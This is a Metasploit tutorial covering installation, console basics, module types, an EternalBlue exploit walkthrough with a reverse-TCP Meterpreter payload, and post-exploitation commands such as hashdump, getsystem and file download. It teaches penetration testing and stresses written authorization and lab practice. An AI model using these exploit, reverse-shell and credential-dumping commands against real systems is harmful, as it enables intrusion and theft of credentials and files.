What Is Metasploit
The Metasploit Framework is the world's most widely used open-source penetration testing platform. Developed originally by H.D. Moore in 2003 and now maintained by Rapid7, it provides security professionals with a comprehensive toolkit for discovering vulnerabilities, developing exploits, and validating security defenses.
Metasploit contains thousands of tested exploits, hundreds of payloads, and a rich set of auxiliary modules for tasks like scanning, fuzzing, and credential harvesting. It is the de facto standard in professional penetration testing and is included by default in security-focused Linux distributions like Kali Linux and Parrot OS.
Running exploits against systems you do not own or have authorization to test is illegal in virtually every jurisdiction. This includes the Computer Fraud and Abuse Act (US), the Computer Misuse Act (UK), and equivalent laws worldwide. Unauthorized use can result in criminal prosecution, civil liability, and permanent career damage. This tutorial is intended solely for learning in controlled lab environments.
Installation and Setup
Metasploit Framework (the open-source edition) can be installed on most Linux distributions, macOS, and Windows. The easiest path is to use Kali Linux, which ships with Metasploit pre-installed.
Installing on Kali Linux
Metasploit comes pre-installed on Kali Linux. If you need to update or reinstall it:
# Update Metasploit to the latest version
sudo apt update
sudo apt install metasploit-framework
# Initialize the database (required for tracking sessions and loot)
sudo msfdb init
# Verify the installation
msfconsole --version
Installing on Ubuntu/Debian
# Install dependencies
sudo apt update
sudo apt install -y curl gnupg2
# Install using the official installer script
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
# Initialize the database
sudo msfdb init
The Metasploit database uses PostgreSQL to store host information, vulnerability data, captured credentials, and session logs. Running msfdb init automatically sets up PostgreSQL and creates the required database. Without it, Metasploit still works, but you lose the ability to track and search through your findings efficiently.
Setting Up a Practice Lab
Never practice against real systems. Instead, use intentionally vulnerable virtual machines:
- Metasploitable 2/3 -- Rapid7's own vulnerable VM, designed specifically for Metasploit practice
- DVWA (Damn Vulnerable Web Application) -- a PHP/MySQL web application with deliberate vulnerabilities
- VulnHub -- a repository of hundreds of intentionally vulnerable VMs for download
- HackTheBox / TryHackMe -- online platforms with legal practice targets
MSF Console Basics
The primary interface for Metasploit is msfconsole, an interactive command-line shell. It provides tab completion, command history, and access to every module in the framework.
# Launch the Metasploit console
msfconsole
On first launch, you will see a banner with ASCII art and statistics about the available modules. The prompt changes to msf6 >, indicating you are inside the console.
Essential Console Commands
# Display help for all commands
msf6 > help
# Check database connectivity
msf6 > db_status
# Search for modules by keyword
msf6 > search type:exploit platform:windows smb
# Get info about a specific module
msf6 > info exploit/windows/smb/ms17_010_eternalblue
# Select a module to use
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# Show configurable options for the selected module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# Go back to the main prompt
msf6 exploit(windows/smb/ms17_010_eternalblue) > back
Press Tab at any point to auto-complete module paths, command names, and option values. For example, typing use exploit/win and pressing Tab will show all Windows exploit modules. This is far faster than memorizing thousands of module paths.
Module Types
Metasploit organizes its functionality into distinct module types. Understanding each type is fundamental to using the framework effectively.
Exploits
Exploit modules take advantage of a specific vulnerability in a target system to deliver a payload. They are categorized by target platform and service.
# Example: list all SMB exploits
msf6 > search type:exploit smb
# Example: list exploits for a specific CVE
msf6 > search cve:2017-0144
Payloads
Payloads are the code that runs on the target system after a successful exploit. Metasploit offers three categories of payloads:
- Singles -- self-contained payloads that perform a single action (e.g., add a user, execute a command)
- Stagers -- small payloads that establish a communication channel between attacker and target, then download the larger stage
- Stages -- larger payloads downloaded by stagers, providing advanced functionality like Meterpreter
# List all available payloads for the current exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
# Set a specific payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
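The singles/stagers/stages distinction is visible in the payload name itself. The following added example (not framework code) decomposes a payload reference such as the windows/x64/meterpreter/reverse_tcp set above into platform, architecture, stage and stager, and reports which connection options the console will ask for; the ARCHES, STAGES and STAGERS sets are small illustrative subsets, an assumption rather than the framework's full lists.

```python
"""Decompose a Metasploit payload reference name into platform, arch, stage and stager.

Added example, not framework code. It relies on the naming convention that a staged
payload is written <platform>/[<arch>/]<stage>/<stager> (for example
windows/x64/meterpreter/reverse_tcp), while a single has no stage/stager split, so the
stageless Meterpreter windows/x64/meterpreter_reverse_tcp is treated as a single."""

# Illustrative subsets (assumption: the framework ships many more of each).
ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe", "ppc"}
STAGES = {"meterpreter", "shell", "vncinject", "dllinject"}
STAGERS = {"reverse_tcp", "bind_tcp", "reverse_http", "reverse_https", "reverse_tcp_rc4"}


def describe_payload(ref):
    """Return a dict describing the payload named by `ref`.

    kind is "staged" when the last two components are a known stage followed by a
    known stager; everything else is treated as a single (self-contained) payload."""
    parts = ref.split("/")
    if len(parts) < 2:
        raise ValueError("expected <platform>/... in payload name: %r" % ref)
    platform, rest = parts[0], parts[1:]
    arch = None
    if rest[0] in ARCHES:
        arch, rest = rest[0], rest[1:]
    if len(rest) == 2 and rest[0] in STAGES and rest[1] in STAGERS:
        kind, stage, name = "staged", rest[0], rest[1]
    else:
        kind, stage, name = "single", None, "/".join(rest)
    # Direction comes from the stager (or from the single's own name):
    # reverse_* calls back to your listener, bind_* listens on the target.
    direction = "reverse" if "reverse" in name else "bind" if "bind" in name else None
    return {"platform": platform, "arch": arch, "kind": kind,
            "stage": stage, "name": name, "direction": direction}


def connection_options(desc):
    """Options the console asks for once this payload is set: a reverse payload needs
    LHOST/LPORT (where to call back), a bind payload needs RHOST/LPORT (where to connect)."""
    if desc["direction"] == "reverse":
        return ("LHOST", "LPORT")
    if desc["direction"] == "bind":
        return ("RHOST", "LPORT")
    return ()
```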
Auxiliary Modules
Auxiliary modules perform tasks that do not involve exploitation directly. These include port scanners, service enumerators, fuzzers, brute-force tools, and denial-of-service testers.
# Example: scan for SMB versions on a network
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/smb/smb_version) > run
Post-Exploitation Modules
Post modules run after you have gained access to a target. They extract information, escalate privileges, pivot through the network, or establish persistence.
# Example: dump password hashes from a compromised Windows system
msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(windows/gather/hashdump) > run
Searching, Configuring, and Running Exploits
The typical Metasploit workflow follows a consistent pattern: search for a module, select it, configure the required options, and run it. Here is a complete walkthrough.
Step 1: Search for Modules
The search command accepts keywords, CVE numbers, platforms, and module types:
# Search by keyword
msf6 > search eternalblue
# Search with filters
msf6 > search type:exploit platform:linux name:apache
# Search by CVE identifier
msf6 > search cve:2021-44228
Step 2: Select and Configure
# Select the module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# View all options and their current values
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# Set the target host (RHOSTS = Remote Hosts)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.50
# Set the local host for the reverse connection (LHOST = Local Host)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.100
# Set the payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
Step 3: Validate and Run
# Check if the target is likely vulnerable (not all exploits support this)
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
The check command tests whether the target is vulnerable without actually running the exploit. Not all modules support it, but when available, it lets you verify the vulnerability before causing any changes to the target system. This is especially important in professional engagements where stability matters.
Meterpreter Basics
Meterpreter (Meta-Interpreter) is Metasploit's most powerful payload. It is an advanced, dynamically extensible payload that runs entirely in memory on the target system, making it difficult to detect with traditional antivirus software. It communicates over an encrypted channel and provides a rich command set for post-exploitation.
Essential Meterpreter Commands
# System information
meterpreter > sysinfo
# Get current user identity
meterpreter > getuid
# List running processes
meterpreter > ps
# Get the current working directory
meterpreter > pwd
# Navigate the file system
meterpreter > cd C:\\Users
meterpreter > ls
# Download a file from the target
meterpreter > download C:\\Users\\target\\Documents\\secret.txt
# Upload a file to the target
meterpreter > upload /home/attacker/tool.exe C:\\temp\\tool.exe
# Take a screenshot of the target's desktop
meterpreter > screenshot
# Attempt to escalate to SYSTEM privileges
meterpreter > getsystem
# Dump password hashes
meterpreter > hashdump
# Drop into a system command shell
meterpreter > shell
# Background the current session (return to msf prompt)
meterpreter > background
# Terminate the session cleanly
meterpreter > exit
Unlike traditional payloads that write files to disk, Meterpreter operates entirely in the target's RAM. This means it leaves minimal forensic evidence and is harder to detect. However, it also means that the session is lost if the target process crashes or the system reboots. Use the migrate command to move to a more stable process.
Session Management
When running multiple engagements, Metasploit tracks each active connection as a session:
# List all active sessions
msf6 > sessions
# Interact with a specific session
msf6 > sessions -i 1
# Kill a specific session
msf6 > sessions -k 1
# Kill all sessions
msf6 > sessions -K
Database and Workspaces
The Metasploit database stores all information gathered during a penetration test -- discovered hosts, open ports, identified services, captured credentials, and session logs. Workspaces allow you to separate data from different engagements.
# Check database status
msf6 > db_status
# Create a new workspace for a specific engagement
msf6 > workspace -a client-pentest-2026
# Switch between workspaces
msf6 > workspace client-pentest-2026
# List all workspaces
msf6 > workspace
# Import Nmap scan results into the database
msf6 > db_import /path/to/nmap-scan.xml
# View discovered hosts
msf6 > hosts
# View discovered services
msf6 > services
# View captured credentials
msf6 > creds
You can run Nmap scans directly from inside Metasploit using the db_nmap command. Results are automatically stored in the database: db_nmap -sV -O 192.168.1.0/24. This saves time compared to running Nmap separately and then importing the XML file.
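To see what db_import (and db_nmap) actually pull out of an Nmap XML report, here is an added example that is not Metasploit's importer: it maps a small constructed report into records shaped like the rows the hosts and services commands display. The sample XML and the decision to skip hosts that never answered are this example's own assumptions.

```python
"""Simplified illustration of what `db_import` extracts from an Nmap XML report.
Added example, not Metasploit's importer: it maps the XML into records shaped like
the rows the `hosts` and `services` console commands display."""
import xml.etree.ElementTree as ET

# Constructed sample report (RFC 5737 documentation addresses, not a real scan).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O 192.0.2.0/29">
  <host><status state="up" reason="echo-reply"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="lab-smb" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
        <service name="microsoft-ds" product="Samba smbd" version="3.X"/></port>
      <port protocol="tcp" portid="22"><state state="closed" reason="reset"/>
        <service name="ssh"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="95"/></os>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="192.0.2.11" addrtype="ipv4"/></host>
</nmaprun>"""

def parse_nmap_xml(xml_text):
    """Return (hosts, services): one host record per responding host and one service
    record per scanned port, keeping the port state the way the `services` table does."""
    hosts, services = [], []
    for host in ET.fromstring(xml_text).findall("host"):
        status, addr = host.find("status"), host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue  # this example skips hosts that never answered (assumption)
        ip = addr.get("addr")
        name, osm = (host.find(p) for p in ("hostnames/hostname", "os/osmatch"))
        hosts.append({"address": ip,
                      "name": name.get("name") if name is not None else None,
                      "os_name": osm.get("name") if osm is not None else None})
        for port in host.findall("ports/port"):
            svc = port.find("service")
            attrs = {} if svc is None else svc.attrib
            # `info` mirrors the product/version column shown by `services`
            services.append({"host": ip, "port": int(port.get("portid")),
                             "proto": port.get("protocol"), "name": attrs.get("name"),
                             "state": port.find("state").get("state"),
                             "info": " ".join(v for v in (attrs.get("product"),
                                                          attrs.get("version")) if v)})
    return hosts, services

def open_services(services):
    """Only the ports worth acting on in an engagement: state 'open'."""
    return [s for s in services if s["state"] == "open"]
```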
Responsible Use
Metasploit is a double-edged sword. The same capabilities that make it invaluable for security professionals can cause serious harm if misused. Responsible use is not optional -- it is the foundation of ethical hacking.
- Written authorization -- never run Metasploit against any system without explicit, written permission from the system owner that defines the scope of testing
- Scope boundaries -- stay within the agreed-upon scope; do not pivot to systems outside the engagement boundaries, even if you discover a path to them
- Document everything -- log all commands, sessions, and findings; this protects both you and the client
- Minimize impact -- prefer non-destructive techniques; avoid denial-of-service exploits unless specifically authorized
- Secure your tools -- protect your Metasploit installation and its data; compromised pentest data is a serious breach
- Report findings -- vulnerabilities you discover must be reported to the system owner with clear remediation guidance
- Clean up -- remove any shells, backdoors, accounts, or artifacts created during testing
Running exploits against systems without authorization is a criminal offense regardless of your intent. Many well-meaning security researchers have faced prosecution for testing systems they believed were in scope but were not covered by their authorization. When in doubt, stop and verify your scope.
Summary
In this tutorial, you learned the fundamentals of the Metasploit Framework:
- What Metasploit is -- the world's leading open-source penetration testing platform
- Installation -- setting up Metasploit and its PostgreSQL database on Kali or Ubuntu
- MSF Console -- navigating the interactive console with search, use, show, and set commands
- Module types -- exploits, payloads (singles/stagers/stages), auxiliary modules, and post-exploitation modules
- Exploit workflow -- searching, configuring RHOSTS/LHOST/PAYLOAD, checking, and running exploits
- Meterpreter -- an in-memory payload with commands for navigation, file transfer, privilege escalation, and session management
- Database and workspaces -- organizing engagement data and integrating with Nmap
- Responsible use -- always requiring written authorization, staying in scope, and documenting findings
You now understand the core concepts of the Metasploit Framework. To build real skill, set up a lab with Metasploitable or similar intentionally vulnerable VMs and practice the full workflow: scan, identify, exploit, post-exploit, and report. Never practice on systems you do not own.